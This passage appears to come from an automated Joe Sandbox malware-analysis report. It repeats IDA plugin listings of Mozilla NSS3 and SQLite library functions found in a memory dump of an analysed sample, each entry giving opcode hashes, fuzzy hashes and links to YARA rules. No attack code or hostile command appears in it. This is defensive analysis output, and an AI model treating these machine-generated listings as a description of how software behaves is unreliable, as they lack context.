                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalEnterErrorHashLookupSectionTableUnlockValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1499782032-0
                                                                                                                                                                                                                                                            • Opcode ID: 56cb5b0f9c0db278256293cf76a48577f70304757cd4501d25c3791fe30deda7
                                                                                                                                                                                                                                                            • Instruction ID: c0df9003e3f0f5448c0f43f8fed9217dfe13e033bf827e9104fef92075fa4b1e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56cb5b0f9c0db278256293cf76a48577f70304757cd4501d25c3791fe30deda7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58114831B04501ABEB206A78DE86E577778EB0275DF304671ED2883311EB36EC5086D2
                                                                                                                                                                                                                                                            Function 6BEC3BF0 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalEnterHashItem_LookupSectionTableUnlockUtilValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1352239609-0
                                                                                                                                                                                                                                                            • Opcode ID: e307eab9f65a10542f9b94aaa443892c4088306443dd1c361d61022b07b799f7
                                                                                                                                                                                                                                                            • Instruction ID: 3a872e7650431d1a02b664b80579219a43493279384523c9ec822e45838491a9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e307eab9f65a10542f9b94aaa443892c4088306443dd1c361d61022b07b799f7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0018E75A046158BDB10AF7CC28986EF7F4AA05654B210A29D8A883301EB38D894CBD2
                                                                                                                                                                                                                                                            Function 6BF649C0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(000A2CD6,00000000,00000000,00000678,?,?,6BF55F34,00000A20), ref: 6BF649EC
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FAB0: free.MOZGLUE(?,-00000001,?,?,6BEBF673,00000000,00000000), ref: 6BF1FAC7
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(000A2CEA,00000000,6BF55F34,00000A20,?,?,?,?,?,?,?,?,?,6BF5AAD4), ref: 6BF649F9
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(000A2CBE,00000000,?,?,6BF55F34,00000A20,?,?,?,?,?,?,?,?,?,6BF5AAD4), ref: 6BF64A06
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,6BF55F34,00000A20), ref: 6BF64A16
                                                                                                                                                                                                                                                            • free.MOZGLUE(000A2CB6,?,?,?,?,6BF55F34,00000A20), ref: 6BF64A1C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Item_UtilZfreefree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2193358613-0
                                                                                                                                                                                                                                                            • Opcode ID: da7b1eacc75d9a865ed0f4fa213d4a23ce16f820c9438661f961b3015f072a2a
                                                                                                                                                                                                                                                            • Instruction ID: 64682c9abdf3ef87d2bb647bf8d0516a33884cd53380ba9e151c78591fb9d3d4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da7b1eacc75d9a865ed0f4fa213d4a23ce16f820c9438661f961b3015f072a2a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D011AB6A00104AFCB00DF65DCD5C56BBBCEF8A25974584A5E909CB212F735E904CBA1
                                                                                                                                                                                                                                                            Function 6BFD0930 Relevance: 7.5, APIs: 5, Instructions: 45fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,00000000,?,6BFD0C83), ref: 6BFD094F
                                                                                                                                                                                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6BFD0C83), ref: 6BFD0974
                                                                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BFD0983
                                                                                                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?,?,6BFD0C83), ref: 6BFD099F
                                                                                                                                                                                                                                                            • OutputDebugStringA.KERNEL32(?,?,6BFD0C83), ref: 6BFD09B2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1872382454-0
                                                                                                                                                                                                                                                            • Opcode ID: 3232091fcf563e6eeaeedda2f9a6515ef006103faaa30053fddf3ee7b5d72178
                                                                                                                                                                                                                                                            • Instruction ID: 54a666ef22a4f34025bf087be2d41c13fdccf728d9633090e644bbdce89d1c42
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3232091fcf563e6eeaeedda2f9a6515ef006103faaa30053fddf3ee7b5d72178
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F10109B57011009FDF00AB78C85AF597BBDAB46718F2801A9F85583362DE7ED890CA16
                                                                                                                                                                                                                                                            Function 6BFD2A40 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Monitor$EnterErrorExitfreestrdup
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1948362043-0
                                                                                                                                                                                                                                                            • Opcode ID: 4fd58e0d256abe9b51ac81db3a8fd6a04f88e16874198ab1a165c7519760be73
                                                                                                                                                                                                                                                            • Instruction ID: 1d33e600eb878517a35fddd920d60a764a6953482a69f98b096ec046ecad1ed1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fd58e0d256abe9b51ac81db3a8fd6a04f88e16874198ab1a165c7519760be73
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01F0A4B3F0016057DE21AFB4DC0AB0AB778AB01688F184070DC0996521EF3FD914C6D2
                                                                                                                                                                                                                                                            Function 6BF55990 Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6BF5599D
                                                                                                                                                                                                                                                              • Part of subcall function 6BED2D70: PK11_DestroyObject.NSS3(28438DC7,FF0477FF,6BEC99FF,?,?,?,?,?,?,?,?,?,6BEC2D6B,?,?,00000000), ref: 6BED2D98
                                                                                                                                                                                                                                                              • Part of subcall function 6BED2D70: PORT_FreeArena_Util.NSS3(28438DC7,00000000,00000000,?,6BEEAE6C,00000000,?,00000000,?,6BEC99FF,?), ref: 6BED2DBB
                                                                                                                                                                                                                                                            • SECKEY_DestroyPrivateKey.NSS3 ref: 6BF559AB
                                                                                                                                                                                                                                                              • Part of subcall function 6BED2D20: PK11_DestroyObject.NSS3(?,?), ref: 6BED2D3C
                                                                                                                                                                                                                                                              • Part of subcall function 6BED2D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6BED2D5F
                                                                                                                                                                                                                                                            • PR_DestroyRWLock.NSS3 ref: 6BF559B9
                                                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?), ref: 6BF559DC
                                                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3 ref: 6BF559EA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Destroy$FreeK11_$Arena_ObjectUtil$LockPrivatePublic
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 33988338-0
                                                                                                                                                                                                                                                            • Opcode ID: 5e147346bf66cc8cdc0bf47bbe83b095369ec857d42fb13165479193297589db
                                                                                                                                                                                                                                                            • Instruction ID: 986a336aab823196ad9fcbc218a402e3a55f870a9451c9a8f83c10086d69a46e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e147346bf66cc8cdc0bf47bbe83b095369ec857d42fb13165479193297589db
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EF068B2F14B4553EE018B34DDA2B15B37CBB7A20CB645325E90853121FF6DE1F48961
                                                                                                                                                                                                                                                            Function 6BF92B20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00020C24,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6BF92B64
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6BF92B5D
                                                                                                                                                                                                                                                            • misuse, xrefs: 6BF92B58
                                                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BF92B4E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
                                                                                                                                                                                                                                                            • API String ID: 632333372-648709467
                                                                                                                                                                                                                                                            • Opcode ID: 5516fc1586e854c3da9f7ca51b5d06ed28e6e9a18c0e0a3657f26a43b84fb37b
                                                                                                                                                                                                                                                            • Instruction ID: 82c07631fe0be2e2b09ddee13d5d9af6e469c96f4d50c9609c736c7b6e96d456
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5516fc1586e854c3da9f7ca51b5d06ed28e6e9a18c0e0a3657f26a43b84fb37b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD51F272B002068BFB04EE68A8817AEB7F6AF49314F14416DC869D7261E73BD845C791
                                                                                                                                                                                                                                                            Function 6BE588D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,01DC7D83), ref: 6BE58990
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                            • String ID: @zk
                                                                                                                                                                                                                                                            • API String ID: 2221118986-3337475015
                                                                                                                                                                                                                                                            • Opcode ID: 6c04c23f6507ad81731eb9fafa94602b1e58fce642875983d78f52ba982c3c5c
                                                                                                                                                                                                                                                            • Instruction ID: c3901fd7e954dd749f78a9abc258fb854ac14d9fd9ce407264370e97aca4c1f3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c04c23f6507ad81731eb9fafa94602b1e58fce642875983d78f52ba982c3c5c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0051D371A14B829FD704CF28C0946A6BBF0BF59308B24929DC8884B713D376F5A6CBD1
                                                                                                                                                                                                                                                            Function 6BE54AC0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000B2F5), ref: 6BE54C2B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                                                            • String ID: delayed %dms for lock/sharing conflict at line %d$winWrite1$winWrite2
                                                                                                                                                                                                                                                            • API String ID: 632333372-1808655853
                                                                                                                                                                                                                                                            • Opcode ID: b1f649198219140e6f474ea3ff138b9f5cf3235eeb285b58a4ef364a7df244ba
                                                                                                                                                                                                                                                            • Instruction ID: c97c5530f93e4a12ca28045d1aa510d1a22604da60b0638c9bbe9843f015f3a2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1f649198219140e6f474ea3ff138b9f5cf3235eeb285b58a4ef364a7df244ba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F741C472A043069BD704CF29C881A5EB7F9FFC5354F21492AF898873A4EB35D9218B91
                                                                                                                                                                                                                                                            Function 6BF96B20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • sqlite3_snprintf.NSS3(?,6BF96AC0,6BFFAAF9,00000000,?,6BF96AC0,?), ref: 6BF96BA9
                                                                                                                                                                                                                                                            • sqlite3_free.NSS3(00000000,?,?,?,?,?,6BF96AC0,?), ref: 6BF96BB2
                                                                                                                                                                                                                                                            • sqlite3_snprintf.NSS3(?,6BF96AC0,OsError 0x%lx (%lu),00000000,00000000,?,6BF96AC0,?), ref: 6BF96BD9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: sqlite3_snprintf$sqlite3_free
                                                                                                                                                                                                                                                            • String ID: OsError 0x%lx (%lu)
                                                                                                                                                                                                                                                            • API String ID: 2089385377-3720535092
                                                                                                                                                                                                                                                            • Opcode ID: 67a275db62178bda9b20e7ceb71b4e12f96d5e7c778f07649edaf82df0ce9baf
                                                                                                                                                                                                                                                            • Instruction ID: 86ff57f7d9591925cb4751b60374f6a981e89c9c96ea2317737bb25c1100bb66
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67a275db62178bda9b20e7ceb71b4e12f96d5e7c778f07649edaf82df0ce9baf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A117576A00109BBEB08AFE5EC89E6FBBB9EF89745710002CF50552561EF355D44CAA1
                                                                                                                                                                                                                                                            Function 6BED9AE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,6BEE3D6E,?,?), ref: 6BED9AFB
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6BEE3D6E,?,?), ref: 6BED9B14
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,6BEE3D6E,?,?), ref: 6BED9B86
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalEnterSectionUnlockValue
                                                                                                                                                                                                                                                            • String ID: n=k
                                                                                                                                                                                                                                                            • API String ID: 1419708843-295187416
                                                                                                                                                                                                                                                            • Opcode ID: c0c8dc81f0a069fdbbcc62f27caf218d040da8e1a25ba0adc0d2748e8ee5ae63
                                                                                                                                                                                                                                                            • Instruction ID: 8b2f811e0a4dc1c1003ed1fba02845a015a2d1022095b735635d2c4873d3f884
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0c8dc81f0a069fdbbcc62f27caf218d040da8e1a25ba0adc0d2748e8ee5ae63
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75217C79A04A019FCB00EF68C494519FBF4FF08354B128A6DD8A98B701D774F8A1CBC5
                                                                                                                                                                                                                                                            Function 6BF8DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00005919,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,6BF8DC98,?,?,?,?), ref: 6BF8DBC4
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6BF8DBBD
                                                                                                                                                                                                                                                            • misuse, xrefs: 6BF8DBB8
                                                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6BF8DBAE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
